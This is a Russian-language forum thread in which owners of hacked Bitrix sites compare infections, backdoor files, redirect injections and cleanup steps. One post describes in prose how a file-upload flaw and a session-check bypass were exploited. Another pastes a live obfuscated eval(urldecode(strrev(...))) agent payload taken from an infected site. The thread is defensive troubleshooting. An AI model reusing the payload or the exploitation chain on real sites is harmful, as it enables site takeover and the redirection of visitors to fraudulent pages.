Илья, я так понимаю поиск бэкдоров ничего не нашел ...
тогда дырку надо самому искать если повезёт - дату изменения файлов злоумышленник не изменит обратно, тогда можно по дате изменения в логах глянуть какой файл "дёрнули" и уже в нём поискать бэкдор если не повезёт, то сложнее - писать анализатор изменившихся файлов и запускать его почаще (в принципе в Вашем случаем можно на эти два файла и "ловить", тогда можно почаще "дёргать" "ловилку") как только изменение будет "поймано" - анализ логов за последний период запуска "ловилки" в общем процесс довольно творческий ...
могу помочь в свободное от работы время, но сразу предупреждаю - я не меценат
написал: Илья, я так понимаю поиск бэкдоров ничего не нашел ...
тогда дырку надо самому искать если повезёт - дату изменения файлов злоумышленник не изменит обратно, тогда можно по дате изменения в логах глянуть какой файл "дёрнули" и уже в нём поискать бэкдор если не повезёт, то сложнее - писать анализатор изменившихся файлов и запускать его почаще (в принципе в Вашем случаем можно на эти два файла и "ловить", тогда можно почаще "дёргать" "ловилку") как только изменение будет "поймано" - анализ логов за последний период запуска "ловилки" в общем процесс довольно творческий ...
могу помочь в свободное от работы время, но сразу предупреждаю - я не меценат
да, бекдоры не нашлись,
даты скорее всего "злоумышленник" поменял, логи по последним изменениям ничего страшного не показывают,
про "ловилку" хорошая мысль, попробую вникнуть как ее можно применить, спасибо!!!
Не знаю насколько у Вас тотже вирус, что был связан с уязвимостью vote.
Я по исходникам накопал следующее кому интересно. Атака была на файл uf.php с определенной структурой В параметрах структуры был определен класс CFileUploader. Именно он и создавался из строки а потом проверялся на instanceOf Connector. Да ошибка выводилась. Но был вызван конструктор CFileUploader Зачем битрикс делал логику загрузки на конструкторе - ума не приложу. Таким макаром загружалась папка в upload/tmp/ и на событии onFileIsStarted прпатчивался агент, который и создавал бэкдур putin_hui...php Как детально не могу сказать, но мне удалось воспроизвести загрузку файла на потенциально уязвимой машине. Патч битров заключался в использовании функции is_a , которая не создает объект а проверяет его наличие. По идее если гдето остался аналогичный вариант подгрузки то загрузить нефиг делать, но я надеюсь Ребята из битрикса знают что делают и дырок нигде нет )))). Рефлексия , конечно дело хорошее но мне кажется на публичке разрешать это использовать както не айс. Мало того в коде проверки проверяется актуальность сессии с помошью функции check_bitrix_sessid() Но эта функция обходится на раз два с помощью опятьже открытого скрипта tools/composite_data.php Тут инфа по серверу, для чего делать его открытым не знаю. Кстати этот скрпит доступен на всех обновленных машинах.
Второго файла вероятно не будет, а в первом - мишура для отвлечения внимания (основа - код из file.php), вызов system() в конструкторе с параметром из заголовка запроса + создание объекта данного класса после определения класса. Наличие данного файла не предполагается в ядре
написал: eIsStarted прпатчивался агент, который и создавал бэкдур putin_hui...php Как детально не могу сказать, но мне удалось воспроизвести загрузку файла на потенциально уязвимой
спасибо, очень познавательно!!!
но у меня немножко другой вирус.... и где искать концы непонятно....
написал: У кого проблема с добавлением js-кода - проверьте наличие файлов и удалите их. /bitrix/components/bitrix/main.file.input/main.php/bitrix/components/bitrix/main.file.input/set_list.phpВторого файла вероятно не будет, а в первом - мишура для отвлечения внимания (основа - код из file.php), вызов system() в конструкторе с параметром из заголовка запроса + создание объекта данного класса после определения класса. Наличие данного файла не предполагается в ядре
спасибо тебе добрый человек!!! все действительно так как ты сказал,
дата изменения этой папки как-раз на момент перед взломом, один из файлов на месте,
но дата как и у всех остальных в папке, а второго нет, видимо самоудалился...
main.php не стал удалять пока, очистил внутренности, будем посмотреть......
написал: Мало того в коде проверки проверяется актуальность сессии с помошью функции check_bitrix_sessid() Но эта функция обходится на раз два с помощью опятьже открытого скрипта tools/composite_data.php Тут инфа по серверу, для чего делать его открытым не знаю. Кстати этот скрпит доступен на всех обновленных машинах.
А как закрыть доступ к этому скрипту tools/composite_data.php? И стоит ли/можно ли это делать, не нарушиться ли работа сайта?
Тоже подверглись взлому. помимо упомянутого файла появились 2 агента 1. $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%77%54%23%d4%03%55%d6%a5%a7%14%a6%a5%97%76%44%f4%97%36%a6%95%43%55%a6%95%b6%86%a7%d4%a6%86%45%95%23%d4%23%d4%b6%65%44%d4%b6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));
эти уязвимости были обнаружены на сайтах, которые крутятся на таймвебе, может кто-нибудь подтвердить или опровергнуть это?
Полагаю, хостинг не причем. У меня подобная проблема - на двух сайтах размещенных на Beget. Причем на двух из пяти сайтах.
Может совпадение, но оба проблемных сайта используют студийные темы шаблоны, один Аспро:NEXT, второй: Электросила.
Другие сайты, шаблоны которые были сверстаны и натянуты на битрикс - работают без проблем.
Могу сказать, что чистка руками указанных файлов: bitrix/modules/main/include/prolog.php /public_html/bitrix/js/main/core/core.js не достаточна, уязвимость остается. После удаления вредоносного кодав указанных фалов, код встраивается снова.
Вот к примеру, почистил указанные файлы, на через несколько дней Яндекс приостановил рекламные компании и прислал письмо:
Цитата
2. Кампания № 618xxxxxx отклонена, так как мы обнаружили редирект на мошеннический сайт в рекламируемой вами ссылке. Вероятно, это связано с некорректной работой платформы, на которой создан ваш сайт. Пожалуйста, обратитесь в службу поддержки платформы вашего сайта для выяснения обстоятельств или замените рекламируемую ссылку на сайт другой платформы.
Также вы можете самостоятельно или через администратора вашего сайта проверить на наличие постороннего вредоносного скрипта https://techmestore.pw/jquery-ui.js и удалить его из кода сайта
После внесения изменений, пожалуйста, напишите нам - проверим материалы повторно.
Полез смотреть, в bitrix/modules/main/include/prolog.php - опять появился вредоносный код.
Сложилось впечатление, что данный вредоносный код появляется раз в неделю, в выходные дни. Возможно так задумано. В понедельник - вторник очистил фалы. И всю неделю ежедневно проверял их на наличие мусора. В пятницу не было, а в воскресение получил письмо от Яндекса, проверил - в файел bitrix/modules/main/include/prolog.php - опять появился проблемный код.
написал: Может совпадение, но оба проблемных сайта используют студийные темы шаблоны, один Аспро:NEXT, второй: Электросила.
У меня используются абсолютно самописные шаблоны, которые делал сам еще бог знает как давно. (2 из 3х заразились) Так что дело точно не в шаблонах. По хостам - просто обмениваемся информацией - а вдруг. Если и на других хостах, значит дело не в хосте
У нас такая же проблема. Появилось 1 июля, заметили только сейчас. Шаблон сайта - ни один из перечисленных выше, хостинг - не таймвеб. Почистил prolog, core и удалил main.php. Агентов, упомянутых выше, нет. Файла /bitrix/tools/putin...php тоже нет Пока не знаю как сделать так, чтобы больше это не появлялось.
Ситуация напрягает, в файл bitrix/modules/main/include/prolog.php периодически встраивается код, который подгружается и при переходе с поисковых систем перенаправляет сайт на левую страницу. Вынужден остановить рекламные компании Яндекс.Директ - так как при переходе с поиска деньги за клик списываются - а пользователь переходит на другую страницу. В понедельник очистил руками, через день проблема появилась опять, правда уже с ссылкой на другой домен.
Юрий Шишнин, очищаете файл bitrix/modules/main/include/prolog.php от встроенного кода, удаляете файл /bitrix/components/bitrix/main.file.input/main.php этот файл создан злоумышленниками, в незараженной установке этого файла быть не должно. Обновляете ядро и все модули до последней версии. Если у вас ядро уже последней версии, то файл /bitrix/js/main/core/core.js нужно заменить с чистой установки этой же редакции БУС, т.к. у вас core.js тоже заражен. А при обновлении ядра core.js перезаписывается чистым файлом без заразы.